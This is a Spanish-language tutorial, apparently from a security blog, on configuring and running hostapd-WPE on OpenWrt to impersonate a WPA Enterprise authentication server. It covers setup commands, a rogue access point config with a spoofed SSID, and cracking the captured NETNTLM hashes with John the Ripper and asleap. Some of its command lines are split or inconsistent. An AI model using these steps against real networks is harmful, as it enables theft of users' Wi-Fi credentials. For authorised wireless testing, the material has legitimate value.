
Ataques sobre infraestructuras WPA Enterprise con hostapd-WPE
Fecha: (Última modificación: 27 - Abr - 2020)
En el artículo anterior sobre hostapd-wpe se detalló el proceso de compilación e instalación del paquete hostapd-WPE para OpenWrt Barrier Breaker 14.07. Este artículo continúa explicando el proceso de configuración y ejecución de hostapd-WPE para OpenWrt con el objetivo de realizar distintas pruebas de seguridad WiFi sobre entornos WPA Enterprise 802.11X.
Hostapd-WPE permite la realización de ataques de suplantación del servidor de autenticación IEEE 802.1x (WPA Enterprise) permitiendo obtener las credenciales de los clientes, aunque también implementa el ataque Cupido, permitiendo realizar ataques sobre clientes que se intentar autenticar mediante la explotación de la vulnerabilidad Heartbleed (CVE-2014-0160) sobre conexiones EAP-PEAP/TLS/TTLS.
Tras la ejecución del script bootstrap se crearán las claves privadas y los distintos certificados. Para hacer uso de los distintos certificados en hostapd-WPE para OpenWrt será necesario copiar los ficheros ca.pem, server.pem, server_no_pass.key, y dh en el directorio /usr/local/etc/hostapd-wpe/certs del dispositivo.
Realizar el cracking con John the ripper:
- Configuración de interfaz 802.11a (5Ghz)
iwconfig
Alternativamente se podrá ejecutar iw, permitiendo identificar las interfaces asociadas a los dispositivos físicos:
iw dev
En caso de que la interfaz 80211a no se encuentre levantada deberá configurarse manualmente. En primer lugar se listarán las interfaces físicas disponibles mediante la ejecución del siguiente comando:
iw phy
Tras la ejecución del mismo se listarán las interfaces físicas mostrando la información de las características de cada dispositivo. Finalmente será posible levantar manualmente la interfaz, en este caso la interfaz física phy0 que será levantada con nombre wlan0 en modo managed.
iw phy phy0 interface add wlan0 type managed
También será posible configurar la interfaz en modo monitor, mediante la modificación del parámetro type estableciendo el valor monitor en vez de managed. Las opciones disponibles para dicho parámetro son las siguientes: managed, ibss, monitor, mesh, wds
- Creación de certificados SSL propios (Opcional)

- Ejecución de hostapd-WPE
- Interfaz
interface=wlan0
- SSID
ssid=Acrylic Wifi
- Canal
channel=6
- Certificados y claves privadas
ca_cert=/usr/local/etc/hostapd-wpe/ca.pem
server_cert=/usr/local/etc/hostapd-wpe/server.pem
private_key=/usr/local/etc/hostapd-wpe/server_no_pass.key
private_key_passwd=whatever
dh_file=/usr/local/etc/hostapd-wpe/dh
- Ficheros de log
wpe_logfile=./wpe_an.log
Los ficheros de configuración por defecto guardan el fichero en el directorio de trabajo actual.
- Ejecución de hostapd iniciando un punto de acceso 802.11b/g/n
Hostapd-wpe -dd /usr/local/etc/hostapd-wpe/hostapd-wpe-bgn.conf
A medida que se conecten los usuarios se irá mostrando por pantalla:

- Ejecución de hostapd iniciando un punto de acceso 802.11ac
Hostapd-wpe -dd /usr/local/etc/hostapd-wpe/hostapd-wpe-an.conf
Cracking de hashes WPA enterprise para la recuperación de credenciales de clientes
En primer lugar será necesario recuperar los hashes WPA enterprise de los ficheros de log y almacenarlos en un fichero.cat wpe_bgn.log
grep "jtr NETNTLM"
sed 's/[ ]*jtr NETNTLM:[ ]*//' > hashes_john.txt

john hashes-john.txt
Alternativamente se puede hacer uso de asleap. El siguiente comando hace uso de John the Ripper para la realización de modificaciones sobre las palabras de un diccionario, para asignarlo a la entrada de asleap. El guión después del parámetro –W (wordlist) permite asignar la salida de John the Ripper realizando la modificación de las palabras del diccionario a la entrada de asleap.
john --wordlist=/usr/share/john/password.lst --rules --stdout
asleap -C 5d:7c:53:ac:39:0d:44:c8 -R
0b:ee:1a:9e:0c:c4:98:aa:55:1c:69:92:62:e5:d5:82:60:0c:e8:81:01:81:23:91 -W -
El cracking también puede ser realizado con Aircrack o CowPatty.
Referencias:
Dejar un comentario